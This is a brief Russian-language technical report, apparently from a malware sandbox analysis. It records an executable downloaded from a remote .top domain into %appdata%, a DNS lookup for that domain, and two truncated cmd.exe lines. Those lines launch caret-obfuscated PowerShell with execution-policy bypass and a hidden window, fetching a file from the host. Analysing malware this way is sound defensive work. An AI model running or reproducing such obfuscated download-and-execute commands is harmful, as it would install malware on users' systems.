Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWErS^hell.^eXe ^-eXecUtio^Np^O^Lic^y^ by^PasS -nop^rOFIL^e ^-wIndOWSTy^lE HIDdE^n (N^E^W^-^ObJEC^t Sy^s^TEm.N^Et^.w^E^BClI^En^T).Dow^N^l^o^aDFi^l^E('http://hometowergop.top/rea...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "PoWErS^hell.^eXe ^-eXecUtio^Np^O^Lic^y^ by^PasS -nop^rOFIL^e ^-wIndOWSTy^lE HIDdE^n (N^E^W^-^ObJEC^t Sy^s^TEm.N^Et^.w^E^BClI^En^T).Dow^N^l^o^aDFi^l^E('http://hometowergop.top/rea...' (со скрытым окном)